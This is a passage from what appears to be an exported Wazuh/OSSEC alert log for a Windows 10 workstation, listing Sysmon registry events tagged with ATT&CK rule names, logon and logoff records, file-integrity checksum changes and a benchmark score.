service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.678079900Z"",""eventRecordID"":""3338"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.652\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.652"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.652 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 13:10:54.324",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.677710200Z"",""eventRecordID"":""3337"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.652\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.652"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.652 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.305",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.666234600Z"",""eventRecordID"":""3336"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.637\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.637"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.637 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 13:10:54.263",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.665783700Z"",""eventRecordID"":""3335"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.637\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.637"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.637 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.217",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.663325100Z"",""eventRecordID"":""3334"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.620\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.620"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.620 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 13:10:54.203",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x681E6 + Linked Logon ID: 0x681B8 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:54.149",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.663098600Z"",""eventRecordID"":""3333"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.620\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.620"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.620 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:54.109",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x681B8 + Linked Logon ID: 0x681E6 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x21c + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:53.958",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.611620300Z"",""eventRecordID"":""3331"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.604\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_69cbe\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.604"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_69cbe\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.604 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_69cbe\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 13:10:53.878",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:10:50.611322300Z"",""eventRecordID"":""3330"",""processID"":""2112"",""threadID"":""2072"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:10:50.604\r\nProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_69cbe\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:10:50.604"",""processGuid"":""{df9fc3d3-e544-5ea2-0000-00100ca80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_69cbe\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:10:50.604 +ProcessGuid: {df9fc3d3-e544-5ea2-0000-00100ca80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_69cbe\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:10:53.099",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:10:52.539",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 13:10:40.556",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:10:36.678",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 13:10:02.226",9,"Windows Application error event",, +"Apr 24, 2020 @ 13:09:49.459",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 13:09:46.413",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 13:09:15.290",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:09:15.243",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:08:34.446",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'ae65b80d3aa8d32f38dfcf0fd6c6b1b0' +New md5sum is : 'cf3754ae4c53bb01ca8f4706679eb2c1' +Old sha1sum was: 'bab24ad7745b947cdd2101c926f3699e6f6cbe15' +New sha1sum is : 'e6b6ed8af81664d49dc704d5d1fe570c44b0494f' +", +"Apr 24, 2020 @ 13:08:23.353",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '16592ee3e500fdaa4ac162c843a5eccb' +New md5sum is : 'f3f5f5fdd6f39cf62e69610c4b6eeae1' +Old sha1sum was: 'c944e39eece978e13da14874c3db94c6dac81dde' +New sha1sum is : '260824863a974bdbdbfd3edb7f0e7b125a50d50d' +", +"Apr 24, 2020 @ 13:08:23.338",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '405cffbdc5c111b423667c5f1506f4b3' +New md5sum is : '1ae2be33276cc123ae315374ecb4bbdb' +Old sha1sum was: '12f9b0ff3cbe3b2f46df3ea4a991699671150a61' +New sha1sum is : '70a0b632322092d49ef0d93a8084c6c74562b3dd' +", +"Apr 24, 2020 @ 13:08:01.229",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '50e564d651df4ed3711c530cb99d635a' +New md5sum is : '8879c1edeb0f0361bd37d770e7639bb2' +Old sha1sum was: '9f85b67a6c52e8312f838e2577ad0927a069eeda' +New sha1sum is : '17ce46a3267c30cb6b7fdcabb90044e72d2e065c' +", +"Apr 24, 2020 @ 13:07:58.682",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcbService\NCBKapiNlmCache\4' checksum changed. +Old md5sum was: '041ceda52ac74d2f1c17260400a6ccd7' +New md5sum is : 'b58c019384b3299402dbe5a0e22d2728' +Old sha1sum was: '71b098fd2ebae082d988fdb8ccb8812878a44c57' +New sha1sum is : 'adf5c3a1c0ff6a1ecdcd328f5d2ad52bb15b804a' +", +"Apr 24, 2020 @ 13:07:24.965",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '32e1b6b1065e3ef22843b8e6000b5ef2' +New md5sum is : '0605cdb24f1ff5338bc41392ba73d94f' +Old sha1sum was: '904e5ecf7a5a42f73ad788fd88d72fd51230a9ec' +New sha1sum is : 'f486515c8d4c93497c80cacf50cdf5c398a099e9' +", +"Apr 24, 2020 @ 13:07:21.901",3,"Windows User Logoff",,"""User initiated logoff: + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36A3A + +This event is generated when a logoff is initiated. No further user-initiated activity can occur. This event can be interpreted as a logoff event.""" +"Apr 24, 2020 @ 13:07:21.309",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:07:21.089",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:07:15.481",5,"Windows System error event",,"""The server Microsoft.Windows.ContentDeliveryManager_10.0.18362.449_neutral_neutral_cw5n1h2txyewy!App.AppXwdz8g2fxr36xz0tdtagygnvemf85s7gg.mca did not register with DCOM within the required timeout.""" +"Apr 24, 2020 @ 13:04:50.766",4,"Summary event of the report's signatures",,"""Fault bucket 1998781362923138110, type 5 +Event Name: RADAR_PRE_LEAK_64 +Response: Not available +Cab Id: 0 + +Problem signature: +P1: TiWorker.exe +P2: 10.0.18362.772 +P3: 10.0.18363.2.0.0 +P4: +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Users\JOHNWI~1\AppData\Local\Temp\RDRDE6.tmp\empty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE7.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE36.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE73.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE83.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 34968c9b-6f96-4335-b7d4-c016c57719fb +Report Status: 268435456 +Hashed bucket: 3ced26c211921b339bbd190f40b46c3e +Cab Guid: 0""" +"Apr 24, 2020 @ 13:04:47.758",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is 